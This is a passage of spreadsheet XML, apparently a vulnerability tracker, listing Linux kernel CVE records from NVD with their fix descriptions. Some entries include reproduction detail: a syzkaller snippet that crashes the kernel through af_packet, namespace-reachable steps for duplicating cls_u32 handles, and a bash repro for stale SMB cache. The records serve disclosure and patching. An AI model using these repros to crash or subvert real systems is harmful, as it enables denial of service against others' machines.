      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="inlineStr"/>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr"/>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched/rt,dl: Skip migrate-disabled tasks when picking a push candidate
A migrate_disable()'d RT task cannot be moved to another CPU, but the
scheduler still keeps such a task on that CPU's pushable list
(rq-&gt;rt.pushable_tasks) and still marks the runqueue RT-overloaded
(rq-&gt;rt.overloaded = 1). So the RT balancer keeps treating this CPU as
having a task to move away, and keeps trying to move the task, but the
push can never succeed. When the head is pinned, push_rt_task() does not
give up either. It falls back to pushing rq-&gt;curr instead, using the
per-CPU stopper, as added by commit a7c81556ec4d ("sched: Fix
migrate_disable() vs rt/dl balancing").
The CPU spends tens of milliseconds in this retry loop. The core is
isolated for real-time work, but during the loop nearly half of its time
is consumed by pushes that cannot succeed.
An ftrace capture of the affected CPU, with sched_switch enabled and
commit 94894c9c477e ("sched/rt: Skip currently executing CPU in
rto_next_cpu()") applied, shows where the CPU time went. Two SCHED_FIFO
tasks at equal priority shared the CPU, taskA migrate_disable()'d and
queued, taskB as rq-&gt;curr. In one 89 ms window, taskB got only 52 ms of
CPU. The other 37 ms went to the stopper thread.
The scheduler kept trying to push taskA, the pinned head of the pushable
list, fell back to pushing taskB instead, and woke the stopper 5204
times. Every one of those pushes failed and no task was moved. taskA
stayed runnable and queued the whole time, and never ran.
Pushing taskB fails on a re-check. find_lock_lowest_rq() drops the rq
lock to take the target rq lock, then checks again with
"task != pick_next_pushable_task(rq)".
The task being pushed is taskB, but the pick returns taskA, the head of
the pushable list. taskB is rq-&gt;curr, and set_next_task_rt() removes the
running task from that list, so taskB can never be the head. The check
expects a candidate taken from the pushable list, but the fallback
pushes rq-&gt;curr, which is never on that list. So the check fails every
time.
   .--&gt; push-IPI arrives
   |          |
   |          v
   |     pushable head = taskA   -&gt;  pinned, cannot be pushed
   |          |
   |          v
   |     so push taskB instead   -&gt;  wake migration/N, a stop-class
   |          |                      thread, so it preempts taskB
   |          v
   |     re-check compares taskB against the pushable head,
   |     which is still taskA                        -&gt;  give up
   |          |
   |          v
   |     nothing moved, taskA still queued, rq still overloaded
   |          |
   '----------'
         repeats every ~17 us, 5204 times, for 89 ms
   The loop cannot stop itself. Every round leaves the runqueue
   exactly as it was, so the next push-IPI does the same thing. In
   the capture it ended only when taskB went to sleep on its own.
   taskA was then picked locally and left the pushable list.
   CPU time per task in the window, from sched_switch:
     taskB         51.95 ms   real work
     migration/N   37.18 ms   nothing moved
     taskA          0.00 ms   queued the whole time, never picked
     idle           0.01 ms
   Counts over the same window:
      7667  push-IPIs handled on this CPU
     17481  pick_next_pushable_task() returned taskA, still pinned
      5204  find_lock_lowest_rq() gave up on the re-check
         1  push that actually completed
         0  migrations of taskA
   The CPU times and the window length come from the standard
   sched_switch tracepoint. The counts needed tracepoints added inside
   the RT balancer for this investigation.
The self-IPI path is closed by the rto_next_cpu() fix above, and that
part works. But the runqueue is still marked overloaded, because the
pinned task is still advertised as pushable. Other CPUs now send the
push-IPIs during their own RT balancing, and the same loop runs again.
Closing the self-IPI path did not stop a pinn
---truncated---</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98087</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98094</t>
        </is>
      </c>
      <c r="D343" s="5" t="inlineStr"/>
      <c r="E343" s="5" t="inlineStr"/>
      <c r="F343" s="5" t="inlineStr"/>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="inlineStr"/>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr"/>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: fbtft: make dirty_lock IRQ-safe
fbtft_mkdirty() can be reached from the fbcon rendering path while
processing printk() in hardirq context. Meanwhile, dirty_lock is also
taken by fbtft_deferred_io() in workqueue context with local interrupts
enabled.
Lockdep reports a possible IRQ lock inversion involving dirty_lock and
console_owner. A hardirq can interrupt a CPU holding dirty_lock and
enter the console rendering path, which can attempt to acquire
dirty_lock again.
The following lockdep report was observed on an RK3566 system with
CONFIG_PROVE_LOCKING enabled:
  WARNING: possible irq lock inversion dependency detected
  swapper/2/0 just changed the state of lock:
  (console_owner){-...}-{0:0}
  but this lock took another, HARDIRQ-unsafe lock in the past:
  (&amp;par-&gt;dirty_lock){+.+.}-{2:2}
  CPU0                    CPU1
  ----                    ----
  lock(&amp;par-&gt;dirty_lock);
                         local_irq_disable();
                         lock(console_owner);
                         lock(&amp;par-&gt;dirty_lock);
  &lt;Interrupt&gt;
    lock(console_owner);
  *** DEADLOCK ***
Use spin_lock_irqsave() for fbtft_mkdirty() and spin_lock_irq() for
fbtft_deferred_io(). They only access the dirty line range, so the
IRQ-off regions remain short.</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98094</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98095</t>
        </is>
      </c>
      <c r="D344" s="5" t="inlineStr"/>
      <c r="E344" s="5" t="inlineStr"/>
      <c r="F344" s="5" t="inlineStr"/>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="inlineStr"/>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr">
        <is>
          <t>f5, go, gin</t>
        </is>
      </c>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr"/>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
af_packet: Don't cast tpacket_hdr.tp_len to int in tpacket_parse_header().
syzbot reported BUG() in sock_sendmsg_nosec(). [0]
The problem is that tpacket_parse_header() casts user-provided
tpacket_hdr.tp_len, which is u32, to int.
If the length is larger than INT_MAX, the following condition
in tpacket_parse_header() passes,
  if (unlikely(tp_len &gt; size_max))
and any negative value can be returned to the caller, up to
sock_sendmsg_nosec().
The repro set tpacket_hdr.tp_len to 0xfffffdef, which is cast
to -EIOCBQUEUED (-529), triggering BUG() in sock_sendmsg_nosec().
  *(uint64_t*)0x200000000008 = 0xfffffdef;
  ...
  syscall(__NR_write, /*fd=*/r[0], /*buf=*/0x200000000000ul, /*count=*/1ul);
Let's define the local tp_len as u32 in tpacket_parse_header().
[0]:
kernel BUG at net/socket.c:803!
Oops: invalid opcode: 0000 [#1] SMP KASAN PTI
CPU: 0 UID: 0 PID: 5628 Comm: syz-executor176 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/24/2026
RIP: 0010:sock_sendmsg_nosec+0x145/0x180 net/socket.c:803
Code: 06 67 48 0f b9 3a eb 95 e8 e8 3a 22 f8 48 89 df 4c 89 f6 4c 89 e2 4d 89 fb 2e e8 32 a5 5c 16 e9 51 ff ff ff e8 cc 3a 22 f8 90 &lt;0f&gt; 0b e8 c4 3a 22 f8 48 83 c3 18 48 89 d8 48 c1 e8 03 42 80 3c 28
RSP: 0018:ffffc90003aefb48 EFLAGS: 00010293
RAX: ffffffff89a578d4 RBX: ffff8880764c67c0 RCX: ffff88807fb23e80
RDX: 0000000000000000 RSI: 00000000fffffdef RDI: 00000000fffffdef
RBP: 00000000fffffdef R08: ffffc90003aef747 R09: 1ffff9200075dee8
R10: dffffc0000000000 R11: fffff5200075dee9 R12: 0000000000000001
R13: dffffc0000000000 R14: ffffc90003aefbc0 R15: ffffffff8aac4310
FS:  000055559101b400(0000) GS:ffff888124ce0000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000210 CR3: 0000000073dca000 CR4: 00000000003526f0
Call Trace:
 &lt;TASK&gt;
 __sock_sendmsg net/socket.c:815 [inline]
 sock_write_iter+0x2de/0x3e0 net/socket.c:1266
 new_sync_write fs/read_write.c:595 [inline]
 vfs_write+0x612/0xba0 fs/read_write.c:687
 ksys_write+0x150/0x270 fs/read_write.c:739
 do_syscall_x64 arch/x86/entry/syscall_64.c:61 [inline]
 do_syscall_64+0x166/0x520 arch/x86/entry/syscall_64.c:84
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f173130ecb9
Code: c0 79 93 eb d5 48 8d 7c 1d 00 eb 99 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 &lt;48&gt; 3d 01 f0 ff ff 73 01 c3 48 c7 c1 d8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffd67e44248 EFLAGS: 00000246 ORIG_RAX: 0000000000000001
RAX: ffffffffffffffda RBX: 0000200000000000 RCX: 00007f173130ecb9
RDX: 0000000000000001 RSI: 0000200000000000 RDI: 0000000000000003
RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 00007ffd67e44388
R13: 0000000000000002 R14: 00002000000000c0 R15: 0000000000000002
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98095</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98102</t>
        </is>
      </c>
      <c r="D345" s="5" t="inlineStr"/>
      <c r="E345" s="5" t="inlineStr"/>
      <c r="F345" s="5" t="inlineStr"/>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="inlineStr"/>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr"/>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: mcast: fix RCU list diversion in ip6_mc_del1_src()
When removing a source filter whose count reaches zero, ip6_mc_del1_src()
unlinks psf from pmc-&gt;mca_sources. If the filter was previously active,
the code moved psf directly into pmc-&gt;mca_tomb by updating psf-&gt;sf_next.
Because pmc-&gt;mca_sources is traversed locklessly under RCU (e.g. by
ipv6_chk_mcast_addr()), mutating psf-&gt;sf_next before a grace period
elapses diverts concurrent readers to the tombstone list. Consequently,
readers miss remaining active sources in pmc-&gt;mca_sources and improperly
examine deleted tombstone entries.
Fix this by allocating a new tombstone node for pmc-&gt;mca_tomb (as done
in sf_setstate()) and retiring the original psf via kfree_rcu().</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98102</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98104</t>
        </is>
      </c>
      <c r="D346" s="5" t="inlineStr"/>
      <c r="E346" s="5" t="inlineStr"/>
      <c r="F346" s="5" t="inlineStr"/>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="inlineStr"/>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr"/>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: cls_u32: fix duplicate handle when node ID pool is exhausted
gen_new_kid() falls back to returning max (htid | 0xFFF) when both
idr_alloc_u32() ranges are full, instead of reporting an error.
u32_change() trusts that value and inserts a new knode with a handle
that is already live in the hash table, breaking handle uniqueness
within the table's node ID space.
The handle was never reserved in ht-&gt;handle_idr, so every later error
path that does idr_remove(&amp;ht-&gt;handle_idr, handle) removes the
reservation of a different, live knode, which is then reused — one
failed add compounds into further duplicates.
The 4095 limit is per (table, bucket) — ht-&gt;handle_idr is per hash
table and the range is derived from htid (bucketid), so a table with
divisor 256 can legitimately hold 256*4095 knodes.
The sibling helper gen_new_htid() has the same silent in-band failure:
it returns 0 when the tp_c handle pool (1..0x7FF) is full, and
u32_init() publishes the root hash table with handle 0 without
checking.  Two root tables with handle 0 alias in u32_lookup_ht(),
allowing cross-tcf_proto knode add/lookup/delete.  Add the same
exhaustion check that the divisor path already has.
Return an error so u32_change() fails with ENOSPC/ENOMEM when the
node ID space is exhausted, and so u32_init() fails with -ENOMEM
when the hash table ID space is exhausted.  The extack message
distinguishes pool exhaustion (-ENOSPC) from a transient allocation
failure (-ENOMEM).
Conditions to recreate the bug:
- CONFIG_NET_SCHED=y, CONFIG_CLS_U32=y (or =m with module loaded)
- Create a clsact qdisc on a device, then add 4095 u32 filters with
  auto-generated handles to fill the node ID space for the root hash
  table (single bucket). The 4096th auto-handle filter add triggers
  the duplicate handle (fh 800::fff reused). Reachable at Level 2
  (unshare -Urn, namespace-local CAP_NET_ADMIN).
- For gen_new_htid: create 2047 u32 proto entries on the same block
  to fill the tp_c handle pool, then create one more. The root table
  gets handle 0 and aliases with other handle-0 root tables.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98104</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98113</t>
        </is>
      </c>
      <c r="D347" s="5" t="inlineStr"/>
      <c r="E347" s="5" t="inlineStr"/>
      <c r="F347" s="5" t="inlineStr"/>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr"/>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr"/>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: rate limit unmapped SID errors
A client can include many structurally valid but unmapped SIDs in a DACL.
Logging every mapping failure lets one request generate hundreds of kernel
error messages.
Rate limit the message to prevent an authenticated client from flooding
the kernel log.</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98113</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98118</t>
        </is>
      </c>
      <c r="D348" s="5" t="inlineStr"/>
      <c r="E348" s="5" t="inlineStr"/>
      <c r="F348" s="5" t="inlineStr"/>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr"/>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr"/>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfs: Fix readahead synchronisation issues by loading all folios upfront
There are some synchronisation issues that derive from the app thread
adding more folios to the rolling buffer whilst the collector thread is
looking at them or trying to clear them, such as determining the setting of
front_folio_order when the next folio hasn't been added yet,
The reason for the rolling buffer approach is that loading the buffer
upfront and then dropping all the refs just acquired is quite a slow
operation, and loading progressively allows some of the cost to be deferred
until after at least some of the I/O is started.
Instead, a better way is to load all the folios into the rolling buffer
upfront - and then drop the refs later, once the I/O is in progress.  (Even
better would be for the refs not to be there at all.)
Fix this by changing the rolling buffer loader to load all the folios
selected by the VM for readahead upfront into the folio queue.  The folio
queue is allocated a batch worth at a time as we don't know how many folios
are involved (the readahead_control struct, alas, has a page count, not a
folio count).
The folio refs acquired from readahead are then dropped in bulk once the
first subrequest is dispatched as it's quite a slow operation.  The
collector waits for NETFS_RREQ_NEED_PUT_RA_REFS to be cleared so that it
doesn't unlock folios before the xarray has been scanned for them.
This simplifies the buffer handling later and isn't noticeably slower as
the xarray doesn't need to be modified and the folios are all already
pre-locked.</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98118</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98125</t>
        </is>
      </c>
      <c r="D349" s="5" t="inlineStr"/>
      <c r="E349" s="5" t="inlineStr"/>
      <c r="F349" s="5" t="inlineStr"/>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="inlineStr"/>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr"/>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/client: fix stale page cache in insert/collapse range
smb3_insert_range() and smb3_collapse_range() use
truncate_pagecache_range() to invalidate the affected page cache.
However, if off or old_eof is not page-aligned, the boundary pages are
only partially zeroed and remain uptodate. As a result, the client may
return stale data after a successful insert/collapse range operation.
For example, with 4K pages:
    page 0          page 1          page 2
    0------4K       4K------8K      8K------12K
       ^                                ^
    off=2K                       old_eof=10K
Page 1 is removed from the page cache, while the boundary pages are
only partially zeroed. After COPYCHUNK moves the data on the server,
these cached pages may still return stale data.
This can be reproduced on a CIFS mount:
    bash -c '
            FILE=/mnt/scratch/repro
            # Use a 6 KiB file so EOF is not page-aligned.
            dd if=/dev/urandom of=/tmp/src bs=1K count=6 status=none
            # Expected: a 4 KiB hole followed by the original data.
            rm -f /tmp/expected
            truncate -s 4K /tmp/expected
            cat /tmp/src &gt;&gt; /tmp/expected
            cp /tmp/src "$FILE"
            # Prime the page cache before moving data on the server.
            cat "$FILE" &gt; /dev/null
            fallocate --insert-range -o 0 -l 4K "$FILE"
            if cmp -s /tmp/expected "$FILE"; then
                    echo "readback: OK"
            else
                    echo "readback: STALE DATA"
            fi
    '
Fix this by writing back dirty data and discarding the page cache from
the start of the page containing off to EOF before moving data on the
server.</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98125</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98128</t>
        </is>
      </c>
      <c r="D350" s="5" t="inlineStr"/>
      <c r="E350" s="5" t="inlineStr"/>
      <c r="F350" s="5" t="inlineStr"/>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="inlineStr"/>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr"/>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: mpi3mr: Fix target device refcount leak in mpi3mr_sas_port_add()
mpi3mr_get_tgtdev_by_addr() increments the target device kref when it
returns a device. If a subsequent error triggers a goto out_fail after
the tgtdev reference is acquired, the reference is never released
because the out_fail path does not call mpi3mr_tgtdev_put(). This
prevents the target device structure from ever being freed.
Add a tgtdev put in the out_fail path, guarded by a NULL check since
tgtdev is only acquired for SAS_END_DEVICE types and the same cleanup
path is shared by earlier error cases where tgtdev is still NULL.</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98128</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98132</t>
        </is>
      </c>
      <c r="D351" s="5" t="inlineStr"/>
      <c r="E351" s="5" t="inlineStr"/>
      <c r="F351" s="5" t="inlineStr"/>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr"/>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr">
        <is>
          <t>checkpoint, go</t>
        </is>
      </c>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr"/>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: don't downgrade half-dead scalar zero spills to STACK_ZERO
states.c:__clean_func_state() can downgrade scalar zero spill to
STACK_ZERO in the following case:
  *(u64 *)(r10 - 8) = 0;
  ... checkpoint ...
  r1 = *(u32 *)(r10 - 4);
  ... no reads from r10-8 ...
Here 4 bytes at r10-8 are dead and verifier changes scalar spill to a
combination: 0000pppp (p stands for poison). Such a change breaks
precision propagation chains. All places that produce STACK_ZERO
should call bpf_mark_chain_precision() for the zero source.
This patch fixes the bug in a simplest way possible:
avoids converting stack spills of zero to STACK_ZERO.
Two smarter approaches are possible:
- do bpf_mark_chain_precision() from __clean_func_state()
- check slot liveness information in check_stack_write_fixed_off()
I investigated both and the changes required are a bit tricky,
hence go with a simple fix for the time being.</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98132</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98134</t>
        </is>
      </c>
      <c r="D352" s="5" t="inlineStr"/>
      <c r="E352" s="5" t="inlineStr"/>
      <c r="F352" s="5" t="inlineStr"/>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr"/>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr"/>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: check_cond_jmp_op(): properly infer if register is null
Nicholas Carlini reported a bug when verifier can incorrectly infer
that a pointer is non-null. The bug occurs when two pointers are
compared and one of them has a type w/o PTR_MAYBE_NULL flag,
but which allows a value to be NULL at runtime.
Here is an example:
  // `a` is PTR_TO_MEM | MEM_RDONLY | PTR_UNTRUSTED
  // `a` is 0 at runtime.
